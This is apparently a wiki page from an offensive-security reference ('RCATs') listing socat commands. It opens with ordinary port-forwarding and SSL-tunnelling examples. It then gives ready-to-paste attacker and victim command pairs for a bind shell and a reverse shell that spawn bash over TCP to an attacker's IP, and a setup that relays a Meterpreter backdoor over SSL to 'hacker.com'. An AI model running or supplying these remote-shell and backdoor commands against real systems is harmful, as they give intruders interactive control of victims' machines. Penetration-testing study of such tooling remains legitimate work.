Socat

From RCATs

Description

socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.

socat can be used, e.g., as TCP port forwarder (one-shot or daemon), as an external socksifier, for attacking weak firewalls, as a shell interface to UNIX sockets, IP6 relay, for redirecting TCP oriented programs to a serial line, to logically connect serial lines on different computers, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.

Commands

# Listen on port 8080 forward all traffic to 80
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Tunnel connection from Local TCP Port to remote service
socat -v tcp4-listen:8000,reuseaddr,fork tcp4:6.6.6.6:80

# Tunnel plain text connection to SSL Endpoint
socat -v tcp4-listen:9000,reuseaddr,fork ssl:6.6.6.6:443,verify=0

# Add requirement that server-side certificates must exist for socat to host SSL/TSL connections
socat -v tcp4-listen:9000,reuseaddr,fork ssl:6.6.6.6:443,verify=0,cert=./provisional_prov.pem

# SLL/TSL Connection on localhost 7000 to remote host on port 6000
socat -v openssl-listen:7000,cert=cert.pem,verify=0,reuseaddr,fork tcp4:6.6.6.6:6000

Bind Shell

# Attacker
socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337

# Victim
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

Reverse Shell

# Attacker
socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

# Victim
socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

Port to Port through SOCKS Proxy

socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678

Meterpreter Through SSL[1]

# Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
# Attacker
socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333

# Victim
socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5

References